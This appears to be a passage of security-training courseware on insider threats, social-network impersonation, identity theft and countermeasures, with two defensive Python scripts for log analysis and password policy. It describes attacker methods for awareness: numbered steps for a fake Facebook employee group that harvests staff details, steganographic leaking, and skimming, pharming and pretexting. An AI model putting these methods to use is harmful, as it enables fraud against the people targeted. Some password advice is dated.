A disgruntled employee may want to make a political or social statement and so leaks or damages the company's confidential data.

Insider Threat Statistics
Source: https://www.observeit.com
Although malicious intent is a serious factor for organizational security, according to a 2018 Cost of Insider Threats Study, an attack caused by employee or contractor negligence is costlier than theft and credential theft by a criminal or malicious insider:
[Figure 9.12: Graph showing insider threat statistics (average annualized cost for three profiles: employee or contractor negligence; criminal and malicious insider; credential theft)]
Types of Insider Threats
[Slide: Malicious Insider; Negligent Insider; Professional Insider; Compromised Insider]
There are four types of insider threats. They are:
+ Malicious Insider
Malicious insider threats come from disgruntled or terminated employees who steal data or destroy company networks intentionally by injecting malware into the corporate network.
+ Negligent Insider
Insiders, who are uneducated on potential security threats or simply bypass general security procedures to meet workplace efficiency, are more vulnerable to social engineering attacks. Many insider attacks result from employees' laxity towards security measures, policies, and practices.
+ Professional Insider
Professional insiders are the most harmful insiders. They use their technical knowledge to identify weaknesses and vulnerabilities in the company's network and sell the organization's confidential information to competitors or black-market bidders.
+ Compromised Insider
An outsider compromises an insider who has access to the critical assets or computing devices of an organization. This type of threat is more difficult to detect since the outsider masquerades as a genuine insider.

Why are Insider Attacks Effective?
Insider attacks are effective because:
+ Insider attacks can go undetected for years, and remediation is expensive.
+ Insider attacks are easy to launch.
+ Preventing insider attacks is difficult; an inside attacker can easily succeed.
+ It is very difficult to differentiate harmful actions from the employee's regular work. It is hard to identify whether employees are performing malicious activities or not.
+ Even after malicious activity is detected, the employee may refuse to accept responsibility and claim it was a mistake.
+ It is easy for employees to cover their actions by editing or deleting logs to hide their malicious activities.
Example of Insider Attack: Disgruntled Employee
Most cases of insider abuse can be traced to individuals who are introverts, incapable of managing stress, experiencing conflict with management, frustrated with their job or office politics, craving respect or promotion, transferred, demoted, or issued an employment termination notice, among other reasons. Disgruntled employees may pass company secrets and intellectual property to competitors for monetary gain, thus harming the organization.
Disgruntled employees can use steganography programs to hide company secrets and later send the information to competitors as an innocuous-looking message such as a picture, image, or sound file using a work email account. No one suspects them because the attacker hides the stolen sensitive information in the picture or image file.

[Figure 9.13: Example of insider attack (disgruntled employee sends company secrets out of the company network)]
Behavioral Indications of an Insider Threat
Indicators of insider threats are generally abnormal user activities that deviate from regular work activities. These represent unusual patterns of user behavior that require further analysis to identify malicious motives and intents. The most common indicator of insider threat is a lack of employee awareness about security measures.
The following are various behavioral indicators of insider threats:
+ Alerts of Data Exfiltration
Alerts of the unauthorized gathering and transmission of data on the network can represent an insider or malware attack. Insiders can also use paper, fax machines, hard drives, portable devices, and other computing equipment to gather and transfer sensitive data.
+ Missing or Modified Network Logs
Insiders try to access the log files to delete, modify, and edit unauthorized access events, file transfer logs, and other records from systems and network devices to avoid detection. Alerts of log modification, deletion, or access can indicate attacks.
+ Changes in Network Usage Patterns
Changes in the network patterns of the network-specific protocols, size of the packets, sources and destinations, frequency of user application sessions, and bandwidth usage can indicate malicious activity.
+ Multiple Failed Login Attempts
The insider can try to login to unauthorized systems or applications by brute-force. So, multiple failed attempts may indicate an insider threat.
+ Behavioral and Temporal Changes
Deviation from established behavior and temporal changes in employee behavior such as spending capacity, frequent travel, anger management issues, constant quarrels with colleagues, and lethargy in performing work are some of the fraud indicators.
+ Unusual Time and Location of Access
Any mismatch in the timeline of an event can be suspicious and may indicate an insider threat. For example, if activities are logged on employee systems in their absence.
+ Missing or Modified Critical Data
Disgruntled employees can modify or delete sensitive data to damage the reputation of the organization.
+ Unauthorized Download or Copying of Sensitive Data
Insiders use legitimate and malicious tools to extract data from the organization's perimeter. Insiders can install malware, trojans, and backdoors to steal information.
+ Sending Sensitive Information to Personal Email Account
Insiders may send critical organizational information to their personal email accounts with malicious intent.
+ Logging of Different User Accounts from Different Systems
Unusual times of access combined with change in the IP address of the system used to login to the account may represent malicious activities.
+ Temporal Changes in Revenue or Expenditure
Unexpected and unexplained changes in the financial status of an employee signify an income generated from external sources. The organization should audit their financial reports to identify whether the employee was involved in any malicious activities.
+ Unauthorized Access to Physical Assets
Activities such as employees using authorized assets without authentication, trying to escalate their privileges beyond their job requirements, or trying to gain physical access to the assets can represent a threat.
+ Increase or Decrease in Productivity of Employee
Employees who are unproductive, threatening, have legitimate or illegitimate job concerns, and disagree with intellectual property rights tend to be suspicious. A sudden increase or decrease in their productivity can signify suspicious behavior.
+ Inconsistent Working Hours, Unusual Business Activities, and Concealed or Frequent Foreign Trips
Employees with suspicious business activities like unusual login times, unusual office hours, unauthorized browsing and downloads, concealed trips abroad, and meetings with representatives from other countries or organizations may pose a threat to the organization.
+ Extreme Behavior Due to Mental Instability
Some employees possess unpredictable and extreme behavior, such as kleptomania, and a sudden change in behavior may be due to mental instability. This raises the probability that they will perform financial fraud, data theft, or physical theft.
+ Signs of Vulnerability (Such as Drug or Alcohol Abuse, Financial Difficulties, Gambling, Illegal Activities)
Employees with bad habits such as drugs, gambling, and alcohol abuse, and relationship issues, may take a chance to breach the organization's data for money. Organizations must regularly monitor the activities of such employees.
+ Complaint on Sensitive Data Leak
Information or complaints regarding sensitive data leaks can represent an insider attack. Check for customer reviews and concerns to identify anomalies and analyze them to identify the insider.
+ Abnormal Access of Systems and User Accounts
The mismatch between the systems assigned and user accounts used to access the systems may indicate an insider threat.
+ Irresponsible Social Media Behavior
Insiders may attempt to create a negative impact on the organization by posting unnecessary information on social media websites.
+ Attempt to Access Restricted Zones
Employees with maliciuos intent may try to access restricted areas of the organization to collect sensitive information.
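Three of the indicators above (multiple failed login attempts, unusual time of access, and one account logging in from different systems) can be extracted from authentication logs. The following Python script is an added example, not code from the courseware: it runs those three checks over a handful of constructed log lines. The log format, the business hours and the thresholds are assumptions made for the example.

```python
"""Flag insider-threat indicators in authentication logs (added example, not courseware code)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines: "<date> <time> <user> <source ip> <LOGIN_OK|LOGIN_FAIL>"
SAMPLE_LOG = """\
2020-03-02 09:05:11 alice 10.0.0.21 LOGIN_OK
2020-03-02 09:40:03 bob 10.0.0.33 LOGIN_OK
2020-03-02 23:12:45 bob 10.0.0.33 LOGIN_OK
2020-03-02 23:14:02 bob 10.0.0.87 LOGIN_OK
2020-03-03 02:10:00 carol 10.0.0.50 LOGIN_FAIL
2020-03-03 02:10:20 carol 10.0.0.50 LOGIN_FAIL
2020-03-03 02:10:41 carol 10.0.0.50 LOGIN_FAIL
2020-03-03 02:11:03 carol 10.0.0.50 LOGIN_FAIL
2020-03-03 02:11:30 carol 10.0.0.50 LOGIN_FAIL
2020-03-03 02:12:00 carol 10.0.0.50 LOGIN_FAIL
2020-03-03 10:00:00 carol 10.0.0.50 LOGIN_OK
"""

# Assumed policy values for this example.
BUSINESS_HOURS = (8, 19)               # logins expected between 08:00 and 19:00
FAIL_THRESHOLD = 5                     # this many failures inside FAIL_WINDOW ...
FAIL_WINDOW = timedelta(minutes=10)    # ... is treated as a brute-force indicator
IP_SWITCH_WINDOW = timedelta(minutes=30)


def parse_log(text):
    """Turn the sample format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time, user, ip, result = line.split()
        ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
        events.append({"ts": ts, "user": user, "ip": ip, "ok": result == "LOGIN_OK"})
    return events


def failed_login_bursts(events):
    """Users with at least FAIL_THRESHOLD failures inside any FAIL_WINDOW span."""
    per_user = defaultdict(list)
    for e in events:
        if not e["ok"]:
            per_user[e["user"]].append(e["ts"])
    flagged = set()
    for user, times in per_user.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over sorted failures
            while times[end] - times[start] > FAIL_WINDOW:
                start += 1
            if end - start + 1 >= FAIL_THRESHOLD:
                flagged.add(user)
                break
    return flagged


def off_hours_logins(events):
    """Successful logins outside BUSINESS_HOURS; the 'unusual time of access' indicator."""
    lo, hi = BUSINESS_HOURS
    return [(e["user"], e["ts"]) for e in events
            if e["ok"] and not lo <= e["ts"].hour < hi]


def ip_switches(events):
    """Same account logging in from a different system within IP_SWITCH_WINDOW."""
    last_ok = {}
    hits = []
    for e in sorted(events, key=lambda x: x["ts"]):
        if not e["ok"]:
            continue
        prev = last_ok.get(e["user"])
        if prev and prev["ip"] != e["ip"] and e["ts"] - prev["ts"] <= IP_SWITCH_WINDOW:
            hits.append((e["user"], prev["ip"], e["ip"]))
        last_ok[e["user"]] = e
    return hits


def insider_indicators(text):
    """Run all three checks and return the findings by indicator name."""
    events = parse_log(text)
    return {
        "failed_bursts": sorted(failed_login_bursts(events)),
        "off_hours": [user for user, _ in off_hours_logins(events)],
        "ip_switches": ip_switches(events),
    }


if __name__ == "__main__":
    for indicator, hits in insider_indicators(SAMPLE_LOG).items():
        print(f"{indicator}: {hits}")
```

On the sample, carol's six failures in two minutes trip the brute-force check, and bob's two late-night logins from different systems trip both the off-hours and the system-switch checks; each hit is a lead for review, not proof of intent.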

Module Flow
[Slide: Social Engineering Concepts; Social Engineering Techniques; Insider Threats; Impersonation on Social Networking Sites; Identity Theft; Countermeasures]
Impersonation on Social Networking Sites
Today social networking sites are widely used by many people that allow them to build online profiles, share information and media such as pictures, blog entries, and music clips. Thus, it is relatively easier for an attacker to impersonate someone. The victim is likely to trust the attacker and eventually reveal information that would help them gain access to the system.
This section describes how attackers perform social engineering through impersonation using various social networking sites such as Facebook, LinkedIn, and Twitter, and highlights the risks these sites pose to corporate networks.

Social Engineering through Impersonation on Social Networking Sites
[Slide: attackers use fraudulent profiles to access networks of friends and extract information using social engineering techniques; information gathered includes organization details, professional details, personal details, and contacts and connections]
As social networking sites such as Facebook, Twitter, and LinkedIn are widely used, attackers co-opt them as a vehicle for impersonation. There are two ways an attacker can perform impersonation on social networking sites:
+ By creating a fictitious profile of the victim on the social media site
+ By stealing the victim's password or indirectly gaining access to the victim's social media account
Social networking sites are a treasure trove for attackers because people share their personal and professional information on these sites, such as name, address, mobile number, date of birth, project details, job designation, company name, and location. The more information people share on a social networking site, the more likely it is that an attacker can impersonate them to launch attacks against them, their associates, or their organization. They may also try to join the target organization's employee groups to extract corporate data.
In general, the information attackers gather from social networking sites includes organization details, professional details, contacts and connections, and personal details, which they then use to execute other forms of social engineering attacks.

Impersonation on Facebook
Source: https://www.facebook.com
Facebook is a well-known social networking site that connects people. It is widely used between friends who share comments and upload links, photos, and videos. To impersonate users on Facebook, attackers use nicknames or aliases instead of their real names. They create fake accounts and try to add "Friends" to view others' profiles and obtain critical and valuable information.

The steps an attacker takes to lure a victim into revealing sensitive information:
1. Create a fake user group on Facebook identified as "Employees of" the target company
2. Using a false identity, proceed to "friend," or invite, actual employees to the fake group, "Employees of Company XYZ"
3. Users join the group and provide their credentials such as date of birth, educational and employment backgrounds, or spouses' names
4. Using the details of any one of the employees, an attacker can compromise a secured facility to gain access to the building
Attackers create a fake account and scan the details on the profile pages of various targets on social networking sites such as LinkedIn and Twitter to engage in spear phishing, impersonation, and identity theft.

Social Networking Threats to Corporate Networks
Before sharing data on a social networking site, or enhancing their private and corporate channels, groups, or profiles, users should be aware of the following social or technical security risks:
- Data Theft: Social networking sites are huge databases accessed by many people worldwide, increasing the risk of information exploitation.
- Involuntary Data Leakage: In the absence of a strong policy that sets clear lines between personal and corporate content, employees may unknowingly post sensitive data about their company on social networking sites, which might help an attacker to launch an attack on the target organization.
- Targeted Attacks: Attackers use the information posted on social networking sites to launch targeted attacks on specific users or companies.
- Network Vulnerability: All social networking sites are subject to flaws and bugs such as login issues and Java vulnerabilities, which attackers could exploit. This could, in turn, lead to the leakage of confidential information related to the target organization's network.
- Spam and Phishing: Employees using work e-mail IDs on social networking sites will probably receive spam and become targets of phishing attacks, which could compromise the organization's network.
- Modification of Content: In the absence of proper security measures and efforts to preserve identity, channels, blogs, groups, profiles, and other platforms can be spoofed.

- Malware Propagation: Social networking sites are ideal platforms for attackers to spread viruses, bots, worms, trojans, spyware, and other malware.
- Business Reputation: Attackers can falsify information about an organization or an employee on social networking sites, resulting in loss of reputation.
- Infrastructure and Maintenance Costs: Using social networking sites entails added infrastructure and maintenance resources for organizations to ensure that their defensive layers are effective safeguards.
- Loss of Productivity: Organizations must monitor employees' network activities to maintain security and ensure that such activities do not misuse the system and company

Identity Theft (slide)
- Identity theft is a crime in which an imposter steals your personally identifiable information such as name, credit card number, social security or driver's license numbers, etc. to commit fraud or other crimes
- Attackers can use identity theft to impersonate employees of a target organization and physically access its facilities
Slide panels: Types of Identity Theft; Common Techniques Attackers Use to Obtain Personal Information for Identity Theft; Indications of Identity Theft
Identity Theft
Identity theft is a problem that many consumers face today. In the United States, some state legislators have imposed laws restricting employees from providing their SSNs (Social Security Numbers) during their recruitment. Identity theft frequently figures in news reports. Companies should be informed about identity theft so that they do not endanger their own anti-fraud initiatives.
This section discusses types of identity theft, common techniques attackers use to obtain personal information for identity theft, and various indications of identity theft.
The Identity Theft and Assumption Deterrence Act of 1998 defines identity theft as the illegal use of someone's personally identifiable information. Identity theft occurs when someone steals others' personally identifying information for fraudulent purposes. Attackers illegally obtain personally identifiable information to commit fraud or other criminal acts.
Types of personally identifiable information stolen by identity thieves:
- Name
- Bank account number
- Home and office address
- Credit card information
- Social security number
- Credit report
- Phone number
- Date of birth
- Driving license number
- Passport number

The attacker steals people's identity for fraudulent purposes such as:
- To open new credit card accounts in the name of the user without paying the bills
- To open a new phone or wireless account in the user's name, or to run up charges on their existing account
- To use the victims' information to obtain utility services such as electricity, heating, or cable TV
- To open bank accounts with the intention of writing bogus checks using the victim's information
- To clone an ATM or debit card to make electronic withdrawals from the victim's accounts
- To obtain loans for which the victim is liable
- To obtain a driver's license, passport, or other official ID card that contains the victim's data with the attacker's photos
- Using the victim's name and Social Security number to receive their government benefits
- To impersonate an employee of a target organization to physically access its facility
- To take over the victim's insurance policies
- To sell the victim's personal information
- To order goods online using a drop-site
- To hijack email accounts
- To obtain health services
- To submit fraudulent tax returns
- To commit other crimes with the intention of providing the victim's name to the authorities during arrest, instead of their own
Types of Identity Theft
Identity theft is constantly increasing, and identity thieves are finding new ways or techniques to steal different types of target information. Some of the types of identity theft are as follows:
Child Identity Theft
This type of identity theft occurs when the identity of a minor is stolen. This is desirable because it may go undetected for a long time. After birth, parents apply for a Social Security Number for their child, which, along with a different date of birth, is used by identity thieves to apply for credit accounts, loans, or utility services, or to rent a place to live and apply for government benefits.

Criminal Identity Theft
This is one of the most common and most damaging types of identity theft. A criminal uses someone's identity to escape criminal charges. When they are caught or arrested, they provide the assumed identity. The best way to protect against criminal identity theft is to keep all personal information secure, which includes following safe Internet practices and being cautious of "shoulder surfers."
Financial Identity Theft
This type of identity theft occurs when a victim's bank account or credit card information is stolen and illegally used by a thief. They can max out a credit card and withdraw money from the account, or can use the stolen identity to open a new account, apply for new credit cards, and take out loans. The information that is required to hack into the victim's account and steal their information is obtained through viruses, phishing attacks, or data breaches.
Driver's License Identity Theft
This type of identity theft is the easiest, as it requires little sophistication. A person can lose their driver's license, or it can easily be stolen. Once it falls into the wrong hands, the perpetrator can sell the stolen driver's license or misuse it by committing traffic violations, of which the victim is unaware and fails to pay fines for, ending up with their license suspended or revoked.
Insurance Identity Theft
Insurance identity theft is closely related to medical identity theft. It takes place when a perpetrator unlawfully takes the victim's medical information to access their insurance for medical treatment. Its effects include difficulties in settling medical bills, higher insurance premiums, and probable trouble in acquiring future medical coverage.
Medical Identity Theft
This is the most dangerous type of identity theft, where the perpetrator uses the victim's name or information without the victim's consent or knowledge to obtain medical products and claim health insurance or healthcare services. Medical identity theft results in frequent erroneous entries in the victim's medical records, which could lead to false diagnoses and life-threatening decisions by the doctors.
Tax Identity Theft
This type of identity theft occurs when the perpetrator steals the victim's Social Security Number to file fraudulent tax returns and obtain fraudulent tax refunds. It creates difficulties for the victim in accessing their legitimate tax refunds and results in a loss of funds. Phishing emails are one of the main tricks used by the criminal to steal a target's information. Therefore, protection from such identity theft includes the adoption of safe Internet practices.

Identity Cloning and Concealment
This type of identity theft encompasses all forms of identity theft where the perpetrators attempt to impersonate someone else simply in order to hide their identity. These perpetrators could be illegal immigrants, those hiding from creditors, or simply those who want to become "anonymous."
Synthetic Identity Theft
This is one of the most sophisticated types of identity theft, where the perpetrator obtains information from different victims to create a new identity. Firstly, he steals a Social Security Number and uses it with a combination of fake names, date of birth, address, and other details required for creating a new identity. The perpetrator uses this new identity to open new accounts, loans, credit cards, phones, other goods, and services.
Social Identity Theft
This is another common type of identity theft where the perpetrator steals the victim's Social Security Number in order to derive various benefits such as selling it to an undocumented person, using it to defraud the government by getting a new bank account, loans, or credit cards, or applying for and obtaining a new passport.

Common Techniques Attackers Use to Obtain Personal Information for Identity Theft
Discussed below are some of the methods by which attackers steal targets' identities, which in turn allow them to commit fraud and other criminal activities:
Theft of wallets, computers, laptops, cell phones, backup media, and other sources of personal information
Physical theft is common. Attackers steal hardware from places such as hotels and recreational places such as clubs, restaurants, parks, and beaches. Given adequate time, they can recover valuable data from these sources.
Internet Searches
Attackers can gather a considerable amount of sensitive information via legitimate Internet sites, using search engines such as Google, Bing, and Yahoo.
Social Engineering
Social engineering is the art of manipulating people into performing certain actions or divulging personal information and accomplishing their task without using cracking methods.
Dumpster Diving and Shoulder Surfing
Attackers rummage through household garbage and the trash bins of organizations, ATM centers, hotels, and other places to obtain personal and financial information for fraudulent purposes.

Criminals may find user information by glancing at documents, observing personal identification numbers (PINs) typed into automatic teller machines (ATMs), or by overhearing conversations.
Phishing
The "fraudster" may pretend to be from a financial institution or other reputable organization and send spam or pop-up messages to trick users into revealing their personal information.
Skimming
Skimming refers to stealing credit or debit card numbers by using special storage devices called skimmers or wedges when processing the card.
Pretexting
Fraudsters may impersonate executives from financial institutions, telephone companies, and other businesses. They rely on "smooth-talking" and win the trust of an individual to reveal sensitive information.
Pharming
Pharming, also known as domain spoofing, is an advanced form of phishing in which the attacker redirects the connection between the IP address and its target server. The attacker may use cache poisoning (modifying the Internet address to that of a rogue address) to do so. When the users type in the Internet address, it redirects them to a rogue website that resembles the original.
Hacking (compromising a user's system)
Attackers may compromise user systems and router information using listening devices such as sniffers and scanners. They gain access to an abundance of data, decrypt it (if necessary), and use it for identity theft.
Keyloggers and Password Stealers (Malware)
An attacker may infect the user's computer with trojans, viruses, or other malware and then record and collect the user's keystrokes to steal passwords, usernames, and other sensitive information of personal, financial, or business import. Attackers may also use emails to send fake forms, such as Internal Revenue Service (IRS) forms, to gather information from their victims.
Wardriving
Attackers search for unsecured Wi-Fi wireless networks in moving vehicles containing laptops, smartphones, or PDAs. Once they find unsecured networks, they access any sensitive information stored on the devices of the users on those networks.
Mail Theft and Rerouting
Often, mailboxes contain bank documents (credit cards or account statements), administrative forms, and other important correspondence. Criminals use this information to obtain credit card information or to reroute the mail to a new address.

Indications of Identity Theft
People do not realize that they are the victim of identity theft until they experience some unknown and unauthorized issues as a result of the theft. Therefore, it is of paramount importance that people watch out for the warning signs that their identities have been compromised. Listed below are some of the signs of identity theft:
- Unfamiliar charges to your credit card that you do not recognize.
- No longer receiving credit card, bank, or utility statements.
- Creditors call asking about an unknown account in your name.
- There are numerous traffic violations under your name that you did not commit.
- You receive charges for medical treatment or services you never received.
- There is more than one tax return filed under your name.
- Being denied access to your own account and unable to take out loans or use other services.
- Not receiving electricity, gas, water, or other services bills due to stolen mail.
- Sudden changes in your personal medical records showing a condition you do not suffer from.
Some additional indications of identity theft are as follows:
- Getting a notification that your information was compromised or misused by a data breach in a company where you are an employee or have an account.
- An inexplicable cash withdrawal from your bank account.
- Calls from debit or credit card fraud control departments giving warnings about suspicious activities on your accounts.
- A refusal of government benefits to you and your child because those benefits are already being received by some other account using your child's Social Security Number.
- Your medical insurance plan rejects your authentic medical claim because someone tampered with your medical records, causing you to reach your benefit limit.

Countermeasures
Social engineers exploit human behavior (such as manners, enthusiasm toward work, laziness, or naivete) to gain access to the targeted company's information resources. Social engineering attacks are difficult to guard against, as the victim might not be aware that he or she has been deceived. They are very much like the other kinds of attacks used to extract a company's valuable data. To guard against social engineering attacks, a company needs to evaluate the risk of different kinds of attacks, estimate possible losses, and spread awareness among its employees.
This section deals with countermeasures that an organization can implement to be more secure against social engineering attacks.

Social Engineering Countermeasures
Attackers implement social engineering techniques to trick people into revealing organizations' confidential information. They use social engineering to perform fraud, identity theft, industrial espionage, and other disreputable behaviors. To guard against social engineering attacks, organizations must develop effective policies and procedures; however, merely developing them is not enough.

To be truly effective, an organization should:
- Disseminate policies among employees and provide proper education and training. Specialized training benefits employees in higher-risk positions against social engineering threats.
- Obtain employee signatures on a statement acknowledging that they understand the organization's policies.
- Define the consequences of policy violations.
The main objectives of social engineering defense strategies are to create user awareness, robust internal network controls, and security policies, plans, and processes. Official security policies and procedures help employees or users make the right security decisions. They should include the following safeguards:
Password Policies
Password policies stating the following guidelines help to increase password security:
- Change passwords regularly.
- Avoid passwords that are easy to guess. It is possible to guess passwords from answers to social engineering questions such as, "Where were you born?" "What is your favorite movie?" or "What is your pet's name?"
- Block user accounts if a user exceeds a certain number of failed attempts to guess a password.
- Choose long (minimum of 6-8 characters) and complex (using various alphanumeric and special characters) passwords.
- Do not disclose passwords to anyone.
Security policies often include advice on proper password management, for example:
- Avoid sharing a computer account.
- Avoid using the same password for different accounts.
- Avoid storing passwords on media or writing them down on a notepad or sticky note.
- Avoid communicating passwords over the phone or through email or SMS.
- Be sure to lock or shut down the computer before stepping away from it.
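An added example, not from the courseware, that turns the password policy above into a check: it rejects short or non-complex passwords and passwords containing facts an attacker could harvest from social media (birthplace, pet's name), and it locks an account after a number of failed attempts. The 8-character minimum and the lockout threshold are assumed values; the page gives a 6-8 character range and no specific attempt count.

```python
import re
import string
from dataclasses import dataclass, field

MIN_LENGTH = 8            # assumed: upper end of the page's "6-8 characters"
MAX_FAILED_ATTEMPTS = 5   # assumed lockout threshold; the page names none


def check_password_policy(password, profile_facts=()):
    """Return a list of policy violations; an empty list means the password complies.

    profile_facts are strings an attacker could learn from a social networking
    profile (city of birth, pet's name, favorite movie). A password that embeds
    one of them is exactly the "guessable from social engineering questions"
    case the policy warns about.
    """
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not re.search(r"[A-Za-z]", password):
        problems.append("no letters")
    if not re.search(r"\d", password):
        problems.append("no digits")
    if not any(ch in string.punctuation for ch in password):
        problems.append("no special characters")
    lowered = password.lower().replace(" ", "")
    for fact in profile_facts:
        token = fact.lower().replace(" ", "")
        # ignore very short facts so a two-letter match does not reject everything
        if len(token) >= 3 and token in lowered:
            problems.append(f"contains guessable profile fact '{fact}'")
    return problems


@dataclass
class AccountLockout:
    """Track failed logins per user and lock the account past the threshold."""
    max_failures: int = MAX_FAILED_ATTEMPTS
    failures: dict = field(default_factory=dict)
    locked: set = field(default_factory=set)

    def record_attempt(self, user, success):
        """Return 'ok', 'failed' or 'locked' for this attempt."""
        if user in self.locked:
            return "locked"          # locked accounts stay locked even on a correct password
        if success:
            self.failures.pop(user, None)   # a good login resets the counter
            return "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        if self.failures[user] >= self.max_failures:
            self.locked.add(user)
            return "locked"
        return "failed"


if __name__ == "__main__":
    # Constructed facts, as an attacker might read them off a public profile.
    print(check_password_policy("Fluffy2015!", ["Fluffy", "Springfield"]))
    lock = AccountLockout(max_failures=3)
    print([lock.record_attempt("bob", False) for _ in range(3)])
```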
Physical Security Policies
Physical security policies address the following areas:
- Issue identification cards (ID cards) and uniforms, along with other access control measures, to the employees of the organization.

- Office security or personnel must escort visitors to designated visitor rooms or lounges.
- Restrict access to certain areas of an organization to prevent unauthorized users from compromising the security of sensitive data.
- Dispose of old documents that contain valuable information by using equipment such as paper shredders and burn bins. This prevents information gathering by attackers using techniques such as dumpster diving.
- Employ security personnel to protect people and property in an organization; supplement trained security personnel with alarm systems, surveillance cameras, and other equipment.
Defense Strategy
- Social Engineering Campaign: An organization should conduct numerous social engineering exercises using different techniques on a diverse group of people in order to examine how its employees might react to real social engineering attacks.
- Gap Analysis: Using the information obtained from the social engineering campaign, a gap analysis evaluates the organization based on industry-leading practices, emerging threats, and mitigation strategies.
- Remediation Strategies: Depending upon the result of the evaluation in the gap analysis, organizations develop a detailed remediation plan to mitigate the weaknesses or the loopholes found in the earlier step. The plan focuses mainly on educating and creating awareness among employees based on their roles and identifying and mitigating potential threats to the organization.
Some additional countermeasures against social engineering are as follows:
- Train Individuals on Security Policies: An efficient training program consists of basic social engineering concepts and techniques, all security policies, and methods to increase awareness of social engineering.

- Implement Proper Access Privileges: There should be administrator, user, and guest accounts with respective levels of authorization.
- Presence of a Proper Incidence Response Time: There should be proper guidelines for reacting to a social engineering attempt.
- Availability of Resources Only to Authorized Users: Make sure sensitive information is secured and that resources are only accessed by authorized users.
- Scrutinize Information: Categorize the information as top secret, proprietary, for internal use only, for public use, or use other categories.
- Perform a Background Check and Proper Termination Process: Insiders with a criminal background and terminated employees are easy targets for procuring information.
- Anti-Virus and Anti-Phishing Defenses: Use multiple layers of anti-virus defenses at end-user and mail gateway levels to minimize social engineering attacks.

- Implement Two-Factor Authentication: Instead of fixed passwords, use two-factor authentication for high-risk network services such as VPNs and modem pools. In the two-factor authentication (TFA) approach, the user must present two different forms of proof of identity. If an attacker is trying to break into a user account, then they need to break both forms of identity, which is more difficult to do. Hence, TFA is a defense-in-depth security mechanism and is typically part of the user multifactor authentication family. The two pieces of evidence that a user provides could include a physical token such as a card, and something the person can remember without much effort, such as a security code, PIN, or password.
- Adopt Documented Change Management: A documented change-management process is more secure than the ad-hoc process.
- Ensure a Regular Update of Software: Organizations should ensure that the system and software are regularly patched and updated, as the attackers exploit unpatched and out-of-date software to obtain useful information to launch an attack.

Detecting Insider Threats
Most data attacks come from insiders, which only makes them more difficult to prevent or detect. Insiders are mostly aware of the security loopholes of the organization, and they exploit them to steal confidential information. It is essential to carefully handle insider threats as they are difficult to thwart and may incur huge financial losses and business interruptions. Some of the methods to detect insider threats are given below:
Insider Risk Controls
Insider data risk presents another layer of complexity for security professionals. It requires designing security infrastructure in such a way that user permissions, access controls, and user actions are monitored efficiently.
Deterrence Controls
The organization's security framework must contain safeguards, follow recommended actions of the employee and IT professionals, provide a separation of duties, and assign privileges. These security controls eliminate or minimize the security risks to the organization's critical assets.
The deterrence controls that the security professionals must have in place to deter insider threats are DLP (Data Loss Prevention) tools, and Identity and Access Management (IAM) tools.

Some of the deterrence controls are:
- DLP Tools:
  - Symantec Data Loss Prevention (https://www.symantec.com)
  - SecureTrust Data Loss Prevention (https://securetrust.com)
  - Check Point Data Loss Prevention (https://www.checkpoint.com)
- IAM Tools:
  - SailPoint IdentityIQ (https://www.sailpoint.com)
  - RSA SecurID Suite (https://www.rsa.com)
  - Core Access Assurance Suite (https://www.coresecurity.com)
Detection Controls
Security professionals must use a variety of security controls and tools to analyze and detect insider threats in organizations.
The detection controls that the security professionals must have in place to detect insider threats are IDS/IPS (Intrusion detection and prevention systems), log management systems, and Security Information and Event Management (SIEM) tools.

Some of the detection controls are:
- IDS/IPS Tools:
  - Check Point IPS Software Blade (https://www.checkpoint.com)
  - IBM Security Network Intrusion Prevention System (https://www.ibm.com)
  - AlienVault Unified Security Management (https://www.alienvault.com)
- Log Management Tools:
  - SolarWinds Security Event Manager (https://www.solarwinds.com)
  - Splunk (https://www.splunk.com)
  - Loggly (https://www.loggly.com)
- SIEM Tools:
  - ArcSight ESM (https://www.microfocus.com)
  - LogRhythm NextGen SIEM Platform (https://logrhythm.com)
  - SolarWinds Log & Event Manager (https://www.solarwinds.com)

Insider Threats Countermeasures
There are safety measures that help an organization to prevent or minimize insider threats:
- Separation and rotation of duties: Divide responsibilities among multiple employees to restrict the amount of power or influence held by any individual. This helps to avoid fraud, abuse, and conflict of interest and facilitates the detection of control failures (including bypassing security controls and information theft). Rotation of duties at random intervals helps an organization to deter fraud or the abuse of privileges.
- Least privileges: Provide users with only enough access privilege to allow them to perform their assigned tasks. This helps maintain information security.
- Controlled access: Access controls in various parts of an organization restrict unauthorized users from gaining access to critical assets and resources.
- Logging and auditing: Perform logging and auditing periodically to check for misuse of company resources.
- Employee monitoring: Use employee monitoring software that records all user sessions, and that can be reviewed by security professionals.
- Legal policies: Enforce legal policies to prevent employees from misusing the organization's resources and sensitive data theft.
- Archive critical data: Maintain a record of the organization's critical data in the form of archives to be used as backup resources, if needed.
- Employee training on cybersecurity: Train employees on how to protect their credentials and the company's confidential data from attack. They will be able to identify social engineering attempts and take proper mitigation and reporting steps.
- Employee background verification: Ensure thorough background checks of all employees before hiring them by using Google search and social networking sites and consulting previous employers.
- Periodic risk assessment: Perform a periodic risk assessment on critical assets to identify vulnerabilities and implement protection strategies against both insider and outsider threats.
- Privileged users monitoring: Implement additional monitoring mechanisms for system administrators and privileged users, as these accounts can be used to deploy malicious code or logic bombs on the system or network.
- Credentials deactivation for terminated employees: Disable all the employee's access profiles to the physical locations, networks, systems, applications, and data immediately after termination.
- Periodic risk assessments: Perform periodic risk assessments on all the organization's critical assets, then develop and maintain a risk management strategy to secure those assets from both insiders and outsiders.
- Layered defense: Implement multiple layers of defense to prevent and protect critical assets from remote attacks originated from insiders. Develop appropriate remote access policies and procedures to thwart such attacks.
- Physical security: Build a professional security team that monitors the physical security of the organization.
- Surveillance: Install video cameras to monitor all critical assets. Install and enable screen-capturing software on all critical servers.

Identity Theft Countermeasures
Identity theft occurs when someone uses personal information (such as a name, social security number, date of birth, mother's maiden name, or address) without the person's knowledge or permission, in a malicious way, such as for credit card or loan services, or even rentals and mortgages.

Listed below are countermeasures that, on implementation, will reduce the chances of identity theft:
- Secure or shred all documents containing private information
- Ensure your name is not present on the marketers' hit lists
- Review credit card reports regularly
- Never give any personal information over the phone
- To keep mail secure, empty the mailbox quickly
- Suspect and verify all requests for personal data
- Protect personal information from being publicized
